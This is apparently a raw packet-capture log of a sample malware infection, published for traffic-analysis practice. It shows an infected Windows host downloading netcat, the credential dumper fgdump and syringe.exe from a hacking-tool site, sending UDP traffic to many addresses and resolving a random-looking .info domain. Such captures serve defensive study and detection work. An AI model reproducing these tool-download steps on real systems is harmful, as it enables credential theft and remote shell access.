Text Example

Tekdefense Hackarmoury.com Malware Rootkit NC Reverse Shell Traffic Analysis Sample PCAP file download

2016-09-27 18:49:21.741750 IP 192.168.1.102.51427 > 75.75.75.75.53: 60216+ A? tools.hackarmoury.com. (39)
2016-09-27 18:49:21.830486 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [S], seq 2438324637, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-09-27 18:49:21.946139 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 1205265555, win 256, length 0
2016-09-27 18:49:21.949965 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 0:86, ack 1, win 256, length 86: HTTP: GET /all_binaries/nc.exe HTTP/1.1
GET /all_binaries/nc.exe HTTP/1.1
User-Agent: AutoIt
Host: tools.hackarmoury.com
2016-09-27 18:49:22.107250 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 385, win 255, length 0
2016-09-27 18:49:33.280161 IP 192.168.1.102.51428 > 75.75.75.75.53: 53720+ A? www.download.windowsupdate.com. (48)

2016-09-27 18:49:59.821707 IP 192.168.1.102.60320 > 162.125.34.129.443: Flags [P.], seq 3757363309:3757364206, ack 3667706116, win 32446, length 897
2016-09-27 18:50:04.394319 IP 192.168.1.102.51429 > 139.194.99.180.16250: UDP, length 198
2016-09-27 18:50:10.549050 IP 192.168.1.102.51429 > 69.36.201.244.22972: UDP, length 252
2016-09-27 18:50:13.934564 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 86:176, ack 385, win 255, length 90: HTTP: GET /all_binaries/fgdump.exe HTTP/1.1
GET /all_binaries/fgdump.exe HTTP/1.1
User-Agent: AutoIt
Host: tools.hackarmoury.com
2016-09-27 18:50:14.079527 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [.], ack 769, win 253, length 0
2016-09-27 18:50:15.674294 IP 192.168.1.102.51429 > 171.7.96.61.19001: UDP, length 92
2016-09-27 18:50:23.049600 IP 192.168.1.102.51429 > 94.70.120.226.22474: UDP, length 111
2016-09-27 18:50:28.633370 IP 192.168.1.102.51429 > 182.172.170.203.11751: UDP, length 109
2016-09-27 18:50:33.383730 IP 192.168.1.102.63295 > 8.253.45.249.80: Flags [F.], seq 240, ack 434, win 254, length 0
2016-09-27 18:50:33.406668 IP 192.168.1.102.63295 > 8.253.45.249.80: Flags [.], ack 435, win 254, length 0
2016-09-27 18:50:34.039372 IP 192.168.1.102.51429 > 194.94.127.98.25549: UDP, length 189
2016-09-27 18:50:39.586352 IP 192.168.1.102.51429 > 206.255.79.99.12982: UDP, length 137
2016-09-27 18:50:40.055715 IP 192.168.1.102.63294 > 85.119.82.42.80: Flags [P.], seq 176:267, ack 769, win 253, length 91: HTTP: GET /all_binaries/syringe.exe HTTP/1.1
GET /all_binaries/syringe.exe HTTP/1.1
User-Agent: AutoIt
Host: tools.hackarmoury.com

2016-09-27 18:50:40.270494 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1140068285, win 65076, length 0
2016-09-27 18:50:40.271013 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [P.], seq 0:316, ack 1, win 65076, length 316: HTTP: GET /storage/samples/tekdefense.dll HTTP/1.1
GET /storage/samples/tekdefense.dll HTTP/1.1
User-Agent: AutoIt
Host: www.tekdefense.com
Cookie: __utma=110816000.2021282349.1474935870.1474935870.1474935870.1; __utmz=110816000.1474935870.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ss_cid=c9d38daf-e0c6-4b79-a875-bec612f4f1db; ss_cpvisit=1474935871624

2016-09-27 18:50:40.572579 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1, win 65076, options [nop,nop,sack 1 {1277:2553}], length 0
2016-09-27 18:50:40.572774 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1, win 65076, options [nop,nop,sack 1 {1277:3829}], length 0
2016-09-27 18:50:40.573418 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 1, win 65076, options [nop,nop,sack 1 {1277:4382}], length 0
2016-09-27 18:50:40.574698 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [.], ack 4382, win 65076, length 0
2016-09-27 18:50:40.577305 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [F.], seq 316, ack 4382, win 65076, length 0
2016-09-27 18:50:40.637550 IP 192.168.1.102.63296 > 198.49.23.179.80: Flags [R.], seq 317, ack 5105, win 0, length 0
2016-09-27 18:50:45.398829 IP 192.168.1.102.51429 > 75.47.231.183.20840: UDP, length 131
2016-09-27 18:50:52.671575 IP 192.168.1.102.51429 > 108.217.170.200.25116: UDP, length 251
2016-09-27 18:51:00.156075 IP 192.168.1.102.51429 > 1.186.47.244.16276: UDP, length 214
2016-09-27 18:51:03.197133 IP 192.168.1.102.60320 > 162.125.34.129.443: Flags [P.], seq 897:1794, ack 258, win 32768, length 897

2016-09-27 18:51:46.996932 IP 192.168.1.102.63301 > 173.194.175.147.80: Flags [P.], seq 0:173, ack 1, win 258, length 173: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: www.google.com
Connection: Close
2016-09-27 18:51:49.253001 IP 192.168.1.102.64677 > 75.75.75.75.53: 64620+ A? ibcerwhewknzzhxwkffeuckrow.info. (49)
2016-09-27 18:51:49.318989 IP 192.168.1.102.63306 > 54.83.43.69.80: Flags [S], seq 1904156170, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-09-27 18:51:49.340014 IP 192.168.1.102.63306 > 54.83.43.69.80: Flags [.], ack 4227199289, win 256, length 0
2016-09-27 18:51:49.340479 IP 192.168.1.102.63306 > 54.83.43.69.80: Flags [P.], seq 0:190, ack 1, win 256, length 190: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: ibcerwhewknzzhxwkffeuckrow.info
Connection: Close
